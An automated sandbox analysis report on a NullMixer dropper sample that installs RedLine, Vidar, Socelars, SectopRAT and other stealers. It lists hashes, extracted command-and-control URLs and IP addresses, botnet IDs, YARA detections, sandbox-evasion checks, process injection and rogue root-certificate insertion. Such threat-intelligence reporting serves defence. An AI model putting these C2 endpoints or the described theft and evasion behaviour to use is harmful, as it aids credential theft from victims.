fabookie | 07b3cf92babb177664467ac45682fe71f3835b6f8533868885297f1143e2ee4f

Analysis

max time kernel
149s
max time network
154s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
18-08-2024 14:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a712cc20b6de80a3a0e5e3575fd8eca7_JaffaCakes118.exe
Size

7.1MB
MD5

a712cc20b6de80a3a0e5e3575fd8eca7
SHA1

5f4e7c064aeaa93440580ccfd9fab019ad5035eb
SHA256

07b3cf92babb177664467ac45682fe71f3835b6f8533868885297f1143e2ee4f
SHA512

151486d9a2cda3671d36752ca582ebaf839cf9e2c99e31abb1b9268ef369c5fd41a481b608de838b480a88f2a8a21f6a745043f32799fa1418b7c6a77957be62
SSDEEP

196608:xlLUCgequxql7wD6ypMupfPDIc/7Iv7yO7I4peAjG:xddgetMl7wphpfn7izI8fG

Malware Config

Extracted

Family

nullmixer

http://hsiens.xyz/

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.znsjis.top/

Extracted

Family

gcleaner

gcl-page.biz

194.145.227.161

Extracted

Family

redline

Botnet

jamesfuck

65.108.20.195:6774

Extracted

Family

vidar

Version

41.1

Botnet

706

https://mas.to/@bardak1ho

Attributes

profile_id
706

Extracted

Family

redline

Botnet

ANI

45.142.215.47:27643

Signatures

Detect Fabookie payload 1 IoCs

resource	yara_rule
behavioral1/files/0x00040000000192ad-81.dat	family_fabookie

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
NullMixer
NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.
dropper nullmixer
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 7 IoCs

resource	yara_rule
behavioral1/memory/2312-193-0x0000000002160000-0x0000000002184000-memory.dmp	family_redline
behavioral1/memory/2312-192-0x0000000001FD0000-0x0000000001FF6000-memory.dmp	family_redline
behavioral1/memory/888-273-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral1/memory/888-271-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral1/memory/888-270-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral1/memory/888-267-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral1/memory/888-265-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 8 IoCs

resource	yara_rule
behavioral1/memory/2428-155-0x00000000010A0000-0x000000000190E000-memory.dmp	family_sectoprat
behavioral1/memory/2312-193-0x0000000002160000-0x0000000002184000-memory.dmp	family_sectoprat
behavioral1/memory/2312-192-0x0000000001FD0000-0x0000000001FF6000-memory.dmp	family_sectoprat
behavioral1/memory/888-273-0x0000000000400000-0x0000000000422000-memory.dmp	family_sectoprat
behavioral1/memory/888-271-0x0000000000400000-0x0000000000422000-memory.dmp	family_sectoprat
behavioral1/memory/888-270-0x0000000000400000-0x0000000000422000-memory.dmp	family_sectoprat
behavioral1/memory/888-267-0x0000000000400000-0x0000000000422000-memory.dmp	family_sectoprat
behavioral1/memory/888-265-0x0000000000400000-0x0000000000422000-memory.dmp	family_sectoprat

Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars payload 1 IoCs

resource	yara_rule
behavioral1/files/0x0005000000019078-88.dat	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Wed20a5199a94f4fab.exe

OnlyLogger payload 2 IoCs

resource	yara_rule
behavioral1/memory/2488-181-0x0000000000400000-0x000000000046F000-memory.dmp	family_onlylogger
behavioral1/memory/2488-293-0x0000000000400000-0x000000000046F000-memory.dmp	family_onlylogger

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral1/memory/1580-179-0x0000000000400000-0x00000000004D7000-memory.dmp	family_vidar
behavioral1/memory/1580-291-0x0000000000400000-0x00000000004D7000-memory.dmp	family_vidar

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3024	powershell.exe

ASPack v2.12-2.42 3 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x001d000000018f3e-57.dat	aspack_v212_v242
behavioral1/files/0x0006000000018f8e-62.dat	aspack_v212_v242
behavioral1/files/0x0009000000018f82-54.dat	aspack_v212_v242

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Wed20a5199a94f4fab.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Wed20a5199a94f4fab.exe

Executes dropped EXE 18 IoCs

pid	Process
2132	setup_install.exe
2284	Wed206c3c41799770a5.exe
2732	Wed20c5a083533c.exe
3004	Wed20669c12bac107e.exe
2428	Wed20a5199a94f4fab.exe
1092	Wed20e918c3fc.exe
1384	Wed20dd154a18517.exe
1580	Wed209992677e6.exe
2992	Wed20adc033d42.exe
2828	Wed2025b8746422.exe
2488	Wed205f46b56e52065.exe
2044	Wed209332277a1.exe
2312	Wed20be9c370a7.exe
2372	Wed20ada9a0ea5a37a5a.exe
2520	Wed2002a84690b72.exe
2060	Wed2025b8746422.tmp
2152	SkVPVS3t6Y8W.EXe
888	Wed20e918c3fc.exe

Loads dropped DLL 64 IoCs

pid	Process
2612	a712cc20b6de80a3a0e5e3575fd8eca7_JaffaCakes118.exe
2612	a712cc20b6de80a3a0e5e3575fd8eca7_JaffaCakes118.exe
2612	a712cc20b6de80a3a0e5e3575fd8eca7_JaffaCakes118.exe
2132	setup_install.exe
2132	setup_install.exe
2132	setup_install.exe
2132	setup_install.exe
2132	setup_install.exe
2132	setup_install.exe
2132	setup_install.exe
2132	setup_install.exe
2624	cmd.exe
1892	cmd.exe
1836	cmd.exe
3004	Wed20669c12bac107e.exe
3004	Wed20669c12bac107e.exe
840	cmd.exe
840	cmd.exe
2412	cmd.exe
568	cmd.exe
568	cmd.exe
2428	Wed20a5199a94f4fab.exe
2428	Wed20a5199a94f4fab.exe
1092	Wed20e918c3fc.exe
1092	Wed20e918c3fc.exe
1384	Wed20dd154a18517.exe
1384	Wed20dd154a18517.exe
1832	cmd.exe
2684	cmd.exe
2684	cmd.exe
1580	Wed209992677e6.exe
1580	Wed209992677e6.exe
2172	cmd.exe
2172	cmd.exe
832	cmd.exe
2992	Wed20adc033d42.exe
2992	Wed20adc033d42.exe
2740	cmd.exe
3052	cmd.exe
2828	Wed2025b8746422.exe
2828	Wed2025b8746422.exe
3052	cmd.exe
2488	Wed205f46b56e52065.exe
2488	Wed205f46b56e52065.exe
2044	Wed209332277a1.exe
2044	Wed209332277a1.exe
3036	cmd.exe
3028	cmd.exe
2312	Wed20be9c370a7.exe
2312	Wed20be9c370a7.exe
2372	Wed20ada9a0ea5a37a5a.exe
2372	Wed20ada9a0ea5a37a5a.exe
2520	Wed2002a84690b72.exe
2520	Wed2002a84690b72.exe
2828	Wed2025b8746422.exe
2060	Wed2025b8746422.tmp
2060	Wed2025b8746422.tmp
2060	Wed2025b8746422.tmp
236	WerFault.exe
236	WerFault.exe
236	WerFault.exe
1676	cmd.exe
2152	SkVPVS3t6Y8W.EXe
2152	SkVPVS3t6Y8W.EXe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x0005000000018fe4-108.dat	themida
behavioral1/memory/2428-155-0x00000000010A0000-0x000000000190E000-memory.dmp	themida

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Wed20a5199a94f4fab.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
20	iplogger.org
21	iplogger.org
41	iplogger.org
44	iplogger.org
64	pastebin.com
65	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	ip-api.com

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2428	Wed20a5199a94f4fab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1092 set thread context of 888	1092	Wed20e918c3fc.exe	81

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
236	2132	WerFault.exe
2064	1580	WerFault.exe	55

System Location Discovery: System Language Discovery 1 TTPs 47 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed20669c12bac107e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed20dd154a18517.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed209332277a1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed205f46b56e52065.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed20be9c370a7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed2025b8746422.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed20e918c3fc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed209992677e6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed20e918c3fc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed20ada9a0ea5a37a5a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed2025b8746422.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup_install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed20a5199a94f4fab.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed20adc033d42.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a712cc20b6de80a3a0e5e3575fd8eca7_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed2002a84690b72.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SkVPVS3t6Y8W.EXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	control.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
2144	taskkill.exe
2440	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	Wed20ada9a0ea5a37a5a.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	Wed20ada9a0ea5a37a5a.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	Wed209332277a1.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	Wed209332277a1.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	Wed209332277a1.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2428	Wed20a5199a94f4fab.exe
3024	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2488	Wed205f46b56e52065.exe

Suspicious use of AdjustPrivilegeToken 39 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeAssignPrimaryTokenPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeLockMemoryPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeIncreaseQuotaPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeMachineAccountPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeTcbPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeSecurityPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeTakeOwnershipPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeLoadDriverPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeSystemProfilePrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeSystemtimePrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeProfSingleProcessPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeIncBasePriorityPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeCreatePagefilePrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeCreatePermanentPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeBackupPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeRestorePrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeShutdownPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeDebugPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeAuditPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeSystemEnvironmentPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeChangeNotifyPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeRemoteShutdownPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeUndockPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeSyncAgentPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeEnableDelegationPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeManageVolumePrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeImpersonatePrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeCreateGlobalPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: 31	2372	Wed20ada9a0ea5a37a5a.exe
Token: 32	2372	Wed20ada9a0ea5a37a5a.exe
Token: 33	2372	Wed20ada9a0ea5a37a5a.exe
Token: 34	2372	Wed20ada9a0ea5a37a5a.exe
Token: 35	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeDebugPrivilege	2144	taskkill.exe
Token: SeDebugPrivilege	2044	Wed209332277a1.exe
Token: SeDebugPrivilege	3024	powershell.exe
Token: SeDebugPrivilege	2284	Wed206c3c41799770a5.exe
Token: SeDebugPrivilege	2440	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2612 wrote to memory of 2132	2612	a712cc20b6de80a3a0e5e3575fd8eca7_JaffaCakes118.exe	30
PID 2612 wrote to memory of 2132	2612	a712cc20b6de80a3a0e5e3575fd8eca7_JaffaCakes118.exe	30
PID 2612 wrote to memory of 2132	2612	a712cc20b6de80a3a0e5e3575fd8eca7_JaffaCakes118.exe	30
PID 2612 wrote to memory of 2132	2612	a712cc20b6de80a3a0e5e3575fd8eca7_JaffaCakes118.exe	30
PID 2612 wrote to memory of 2132	2612	a712cc20b6de80a3a0e5e3575fd8eca7_JaffaCakes118.exe	30
PID 2612 wrote to memory of 2132	2612	a712cc20b6de80a3a0e5e3575fd8eca7_JaffaCakes118.exe	30
PID 2612 wrote to memory of 2132	2612	a712cc20b6de80a3a0e5e3575fd8eca7_JaffaCakes118.exe	30
PID 2132 wrote to memory of 1016	2132	setup_install.exe	32
PID 2132 wrote to memory of 1016	2132	setup_install.exe	32
PID 2132 wrote to memory of 1016	2132	setup_install.exe	32
PID 2132 wrote to memory of 1016	2132	setup_install.exe	32
PID 2132 wrote to memory of 1016	2132	setup_install.exe	32
PID 2132 wrote to memory of 1016	2132	setup_install.exe	32
PID 2132 wrote to memory of 1016	2132	setup_install.exe	32
PID 2132 wrote to memory of 2624	2132	setup_install.exe	33
PID 2132 wrote to memory of 2624	2132	setup_install.exe	33
